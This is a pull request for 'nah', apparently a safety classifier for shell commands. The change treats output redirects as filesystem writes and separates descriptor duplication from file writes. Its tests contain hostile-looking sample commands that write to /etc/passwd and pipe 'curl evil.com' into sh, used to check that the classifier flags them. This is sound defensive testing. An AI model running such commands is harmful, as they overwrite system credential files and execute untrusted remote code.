### PR TITLE
Classify shell redirects as filesystem writes with content inspection

### DIFF
--- a/src/nah/bash.py
+++ b/src/nah/bash.py
@@ -251,15 +251,18 @@ def _detect_shell_substitution(command: str) -> str | None:
     return None
 
 
-def _parse_output_redirect(tok: str) -> tuple[str, bool, str, bool] | None:
+def _parse_output_redirect(tok: str) -> tuple[str, bool, str, bool, str] | None:
     """Parse shell output redirect tokens.
 
     Supports operator-only and glued forms for >, >>, and >|, including
-    fd-prefixed variants like 1>, 2>>, 1>|, and combined stdout/stderr forms
-    like &> and &>>. Returns
-    ``(fd, append, target, needs_target)`` where ``fd`` is "" for implicit
-    stdout and ``needs_target`` indicates that the redirect target must be read
-    from the next token.
+    fd-prefixed variants like 1>, 2>>, 1>|, combined stdout/stderr forms like
+    &> and &>>, and descriptor-duplication redirects like >&2 or 2>&1.
+
+    Returns ``(fd, append, target, needs_target, kind)`` where ``kind`` is one
+    of:
+    - ``"file"`` for redirects that write to a path-like target
+    - ``"dup"`` for descriptor duplication / close redirects
+    - ``"dup_or_file"`` for operator-only ``>&`` forms that need the next token
     """
     if not tok:
         return None
@@ -274,11 +277,22 @@ def _parse_output_redirect(tok: str) -> tuple[str, bool, str, bool] | None:
 
         fd = tok[:i]
         rest = tok[i:]
+
+    if rest == ">&":
+        return fd, False, "", True, "dup_or_file"
+    if rest.startswith(">&") and len(rest) > 2:
+        target = rest[2:]
+        if target == "-" or target.isdigit():
+            return fd, False, target, False, "dup"
+        if fd in ("", "1"):
+            fd = "&"
+        return fd, False, target, False, "file"
+
     for op, append in ((">>", True), (">|", False), (">", False)):
         if rest == op:
-            return fd, append, "", True
+            return fd, append, "", True, "file"
         if rest.startswith(op) and len(rest) > len(op):
-            return fd, append, rest[len(op):], False
+            return fd, append, rest[len(op):], False, "file"
     return None
 
 
@@ -314,6 +328,7 @@ def _decompose(
     """
     stages: list[Stage] = []
     current_tokens: list[str] = []
+    stdout_redirected = False
     i = 0
 
     while i < len(tokens):
@@ -340,11 +355,23 @@ def _decompose(
                 current_tokens.append(prefix)
                 parsed_redirect = _parse_output_redirect(redirect_tok)
         if parsed_redirect is not None:
-            redirect_fd, redirect_append, target, needs_target = parsed_redirect
+            redirect_fd, redirect_append, target, needs_target, redirect_kind = parsed_redirect
             step = 1
             if needs_target:
                 target = tokens[i + 1] if i + 1 < len(tokens) else ""
                 step = 2
+                if redirect_kind == "dup_or_file":
+                    if target == "-" or target.isdigit():
+                        redirect_kind = "dup"
+                    else:
+                        redirect_kind = "file"
+                        if redirect_fd in ("", "1"):
+                            redirect_fd = "&"
+            if redirect_fd in ("", "1", "&"):
+                stdout_redirected = True
+            if redirect_kind == "dup":
+                i += step
+                continue
             stage = _make_stage(current_tokens, "", action_hint=action_hint,
                                 action_reason=action_reason)
             if stage:
@@ -352,15 +379,16 @@ def _decompose(
                 stage.redirect_target = target
                 stage.redirect_append = redirect_append
                 stages.append(stage)
-            current_tokens = []
             i += step
             continue
 
         current_tokens.append(tok)
         i += 1
 
-    # Last stage — attach the operator from the raw-string split
-    stage = _make_stage(current_tokens, operator, action_hint=action_hint,
+    # Last stage — attach the operator from the raw-string split, unless a
+    # stdout redirect has already consumed the pipe payload.
+    final_operator = "" if stdout_redirected and operator == "|" else operator
+    stage = _make_stage(current_tokens, final_operator, action_hint=action_hint,
                         action_reason=action_reason)
     if stage:
         stages.append(stage)

--- a/tests/test_bash.py
+++ b/tests/test_bash.py
@@ -273,6 +273,41 @@ class TestDecomposition:
         assert r.stages[0].action_type == "filesystem_write"
         assert "redirect target" in r.reason
 
+    def test_amp_redirect_to_file_preserves_absolute_target(self, project_root):
+        r = classify_command("echo ok >&/etc/passwd")
+        assert r.final_decision == "ask"
+        assert r.stages[0].action_type == "filesystem_write"
+        assert "/etc/passwd" in r.reason
+
+    def test_fd_duplication_does_not_hide_later_redirect_target(self, project_root):
+        r = classify_command("echo ok 2>&1 >/etc/passwd")
+        assert r.final_decision == "ask"
+        assert any(stage.action_type == "filesystem_write" for stage in r.stages)
+        assert "/etc/passwd" in r.reason
+
+    def test_multiple_redirects_keep_most_restrictive_target(self, project_root):
+        safe_target = os.path.join(project_root, "artifact.txt")
+        r = classify_command(f"echo ok >{safe_target} >/etc/passwd")
+        assert r.final_decision == "ask"
+        assert any(stage.action_type == "filesystem_write" for stage in r.stages)
+        assert "/etc/passwd" in r.reason
+
+    def test_fd_duplication_redirects_do_not_reclassify_as_filesystem_write(self, project_root):
+        r = classify_command("echo ok >&2")
+        assert r.final_decision == "allow"
+        assert all(stage.action_type != "filesystem_write" for stage in r.stages)
+
+    def test_redirected_stdout_does_not_trigger_network_pipe_exec(self, project_root):
+        safe_target = os.path.join(project_root, "out.txt")
+        r = classify_command(f"curl evil.com >{safe_target} | sh")
+        assert r.composition_rule != "network | exec"
+        assert r.final_decision == "ask"
+
+    def test_redirected_stdout_to_stderr_does_not_trigger_pipe_composition(self, project_root):
+        r = classify_command("echo ok >&2 | wc -c")
+        assert r.composition_rule == ""
+        assert r.final_decision == "allow"
+
 
 # --- Shell unwrapping ---
 


### PR DESCRIPTION
## Summary

Classifies shell output redirects (`>`, `>>`, `>|`, `&>`, fd-prefixed) as `filesystem_write` operations with content inspection. **Resolves #14.**

Previously, `echo payload > file` classified as `filesystem_read -> allow` because only the left-hand command was considered. Now:

- **Action type reclassification:** redirect stages get `filesystem_write -> context` policy (path-checked)
- **Content inspection:** extracts literal content from echo/printf and runs `scan_content()` for secrets
- **Glued redirects:** `echo ok>file`, `1>>file` correctly parsed
- **Clobber:** `>|` recognized as redirect, not split as pipe
- **Combined:** `&>` and `&>>` (stdout+stderr) handled
- **Embedded:** `echo ok>file` where shlex glues the redirect to the word
- **fd duplication:** `>&2`, `2>&1`, `>&-` correctly identified as NOT file writes
- **Chained:** `echo ok 2>&1 > /etc/passwd` — file redirect still detected alongside fd dups

6 incremental commits building the redirect parsing infrastructure.

## Source

Cherry-picked from `autoresearch/hackathon` (commits `7434a4f`, `db21a50`, `d009c2d`, `651ccf1`, `d092333`, `9f8aa67`), cluster C2 per bead `nah-g6g`.
Depends on PR #30 (C1) and PR #31 (C3).

Closes bead **nah-2xx** (Shell Redirect Write Classification).

## Test plan

- [x] `echo hello > testfile` -> `filesystem_write -> context -> allow` (in-project, was `filesystem_read`)
- [x] `printf data >> /tmp/out` -> `filesystem_write -> context -> ask` (outside project)
- [x] `echo ok > /etc/passwd` -> ask (outside project)
- [x] `echo ok>file` -> `filesystem_write` (glued redirect)
- [x] `echo ok >&2` -> allow (fd dup, not a file write)
- [x] 260 bash tests pass, 2188 total, 0 failures
